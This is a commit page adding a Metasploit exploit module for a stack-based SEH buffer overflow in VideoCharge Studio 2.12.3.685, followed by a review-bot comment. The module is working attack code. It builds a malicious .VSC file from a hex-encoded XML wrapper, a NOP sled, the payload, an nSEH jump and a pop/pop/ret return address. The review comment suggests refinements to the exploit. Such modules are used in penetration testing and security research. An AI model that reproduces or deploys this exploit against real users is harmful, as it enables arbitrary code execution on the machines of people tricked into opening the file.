Added VideoCharge Studio File Format Exploit

bug/bundler_fix
jakxx 2015-08-07 15:54:32 -04:00
parent 67f661823a
commit 28ad0fccbd
1 changed files with 92 additions and 0 deletions


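--- /dev/null
+++ b/PATH_NOT_SHOWN_ON_PAGE
@@ -0,0 +1,92 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = NormalRanking
+include Msf::Exploit::FILEFORMAT
+include Msf::Exploit::Seh
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'VideoCharge Studio 2.12.3.685 Buffer Overflow (SEH)',
+'Description' => %q{
+This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when
+processing a specially crafted .VSC file. This vulnerability could be
+exploited by a remote attacker to execute arbitrary code on the target
+machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'metacom', # Original discovery
+'Andrew Smith', # MSF Module
+],
+'References' =>
+[
+[ 'OSVDB', '69616' ],
+[ 'CVE', '' ],
+[ 'EBD', '29234' ]
+],
+'DefaultOptions' =>
+{
+'ExitFunction' => 'process',
+},
+'Platform' => 'win',
+'Payload' =>
+{
+'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
+'DisableNops' => true,
+},
+'Targets' =>
+[
+[ 'VideoCharge Studio 2.12.3.685',
+{
+'Ret' => 0x61B811F1, #p/p/r | zlib1.dll
+'Offset' => 824
+}
+],
+],
+'Privileged' => false,
+'DisclosureDate' => 'Oct 27 2013',
+'DefaultTarget' => 0))
+register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.vsc']),], self.class)
+end
+def exploit
+buffer = "\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22"
+buffer << "\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x57\x69\x6E\x64\x6F\x77\x73\x2D\x31\x32"
+buffer << "\x35\x32\x22\x20\x3F\x3E\x3C\x63\x6F\x6E\x66\x69\x67\x20\x76\x65\x72\x3D\x22\x32\x2E"
+buffer << "\x31\x32\x2E\x33\x2E\x36\x38\x35\x22\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D"
+buffer << "\x65\x3D\x22\x46\x69\x6C\x65\x73\x22\x2F\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61"
+buffer << "\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x73\x22\x3E\x0A\x0A\x3C\x50\x72\x6F\x70"
+buffer << "\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x22\x3E\x0A"
+buffer << "\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x46\x6F\x72\x6D\x61\x74\x73\x22"
+buffer << "\x3E\x0A\x0A\x3C\x50\x72\x6F\x70\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x53\x74"
+buffer << "\x72\x65\x61\x6D\x22\x3E\x0A\x0A\x3C\x56\x61\x6C\x75\x65\x20\x6E\x61\x6D\x65\x3D\x22"
+buffer << "\x4E\x61\x6D\x65\x22\x20\x74\x79\x70\x65\x3D\x22\x38\x22\x20\x76\x61\x6C\x75\x65\x3D\x22"
+buffer << make_nops(target['Offset']-payload.encoded.length)
+buffer << payload.encoded
+buffer << "\xeb\x06\x90\x90" #nseh negative jump
+buffer << [target.ret].pack("V")
+buffer << "\xe9\x3f\xfd\xff\xff" #long jump
+buffer << "\x22\x2F\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F"
+buffer << "\x63\x6F\x6C\x73\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x52\x6F"
+buffer << "\x6D\x61\x6E\x69\x61\x20\x53\x65\x63\x75\x72\x69\x74\x79\x20\x54\x65\x61\x6D\x22\x2F"
+buffer << "\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6C"
+buffer << "\x73\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6E\x66\x69\x67\x3E"
+print_status("Creating '#{datastore['FILENAME']}' file ...")
+file_create(buffer)
+end
+end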
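Review bot: The `'References'` array carries an empty CVE entry and a mistyped source tag: `[ 'CVE', '' ]` resolves to nothing and `'EBD'` is not a recognized Metasploit reference type, so the Exploit-DB link will never render; drop the empty CVE line and change the other to `[ 'EDB', '29234' ]`. The XML template in `exploit` is plain ASCII spelled out as `\x..` escapes across the buffer lines before and after the payload, which hides the document structure from anyone reviewing the file; a `<<~XML` heredoc that keeps the same `\n` pairs would produce the identical bytes and be readable. The `'Payload'` hash also sets no `'Space'`, so an encoded payload longer than `target['Offset']` hands `make_nops` a negative count instead of being rejected; adding `'Space' => 824` next to `'BadChars'` lets the framework enforce the bound up front.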